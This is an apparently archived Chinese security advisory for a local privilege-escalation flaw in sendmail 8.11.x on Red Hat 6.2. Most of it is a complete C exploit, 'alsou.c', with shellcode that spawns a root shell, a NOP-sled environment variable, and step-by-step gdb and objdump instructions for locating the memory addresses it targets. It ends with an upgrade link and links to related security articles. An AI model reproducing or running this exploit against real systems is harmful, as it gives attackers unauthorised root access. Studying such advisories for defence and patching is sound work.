sendmail漏洞(APP缺陷)

涉及程序：

sendmail

描述：

本地攻击者利用 sendmail 漏洞能取得 root 权限

详细：

发现 sendmail 存在本地漏洞，攻击者利用此漏洞能取得 root 特权。

测试系统：

Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18

以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负

/*

* alsou.c

*

* sendmail-8.11.x linux x86 exploit

*

* To use this exploit you should know two numbers: VECT and GOT.

* Use gdb to find the first:

*

* $ gdb -q /usr/sbin/sendmail

* (gdb) break tTflag

* Breakpoint 1 at 0x8080629

* (gdb) r -d1-1.1

* Starting program: /usr/sbin/sendmail -d1-1.1

*

* Breakpoint 1, 0x8080629 in tTflag ()

* (gdb) disassemble tTflag

* .............

* 0x80806ea : dec %edi

* 0x80806eb : mov %edi,0xfffffff8(%ebp)

* 0x80806ee : jmp 0x80806f9

* 0x80806f0 : mov 0x80b21f4,%eax

* ^^^^^^^^^^^^^^^^^^ address of VECT

* 0x80806f5 : mov %bl,(%esi,%eax,1)

* 0x80806f8 : inc %esi

* 0x80806f9 : cmp 0xfffffff8(%ebp),%esi

* 0x80806fc : jle 0x80806f0

* .............

* (gdb) x/x 0x80b21f4

* 0x80b21f4 : 0x080b9ae0

* ^^^^^^^^^^^^^ VECT

*

* Use objdump to find the second:

* $ objdump -R /usr/sbin/sendmail |grep setuid

* 0809e07c R_386_JUMP_SLOT setuid

* ^^^^^^^^^ GOT

*

* Probably you should play with OFFSET to make exploit work.

*

* Constant values, written in this code found for sendmail-8.11.4

* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and

* GOT = 0x0809e07c.

*

* To get r00t type ./alsou and then press Ctrl+C.

*

*

* grange

*

*/

#include

#include

#define OFFSET 1000

#define VECT 0x080baf20

#define GOT 0x0809f544

#define NOPNUM 1024

char shellcode[] =

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"

"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"

"\xc0\x88\x43\x07\x89\x5b\x08\x89"

"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"

"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"

"/bin/sh";

unsigned int get_esp()

{

__asm__("movl %esp,%eax");

}

int main(int argc, char *argv[])

{

char *egg, s[256], tmp[256], *av[3], *ev[2];

unsigned int got = GOT, vect = VECT, ret, first, last, i;

egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);

if (egg == NULL) {

perror("malloc()");

exit(-1);

}

sprintf(egg, "EGG=");

memset(egg + 4, 0x90, NOPNUM);

sprintf(egg + 4 + NOPNUM, "%s", shellcode);

ret = get_esp() + OFFSET;

sprintf(s, "-d");

first = -vect - (0xffffffff - got + 1);

last = first;

while (ret) {

i = ret & 0xff;

sprintf(tmp, "%u-%u.%u-", first, last, i);

strcat(s, tmp);

last = ++first;

ret = ret >> 8;

}

s[strlen(s) - 1] = '\0';

av[0] = "/usr/sbin/sendmail";

av[1] = s;

av[2] = NULL;

ev[0] = egg;

ev[1] = NULL;

execve(*av, av, ev);

}

解决方案：

下载安装升级版本：

http://www.sendmail.org/8.12.0.Beta19.html

• ·状态检测工作机制
• ·用LIDS增强系统安全
• ·“SSH”让远程控制更安全
• ·远程shell特洛伊木马病毒
• ·Internet安全原理之FTP
• ·使用wu-ftp2.x来取得root权限
• ·10种分布式拒绝服务攻击的应急解决方法
• ·通过TCP/IP堆栈特征探测远程操作系统
• ·anonymous的入侵
• ·配置安全的Linux服务器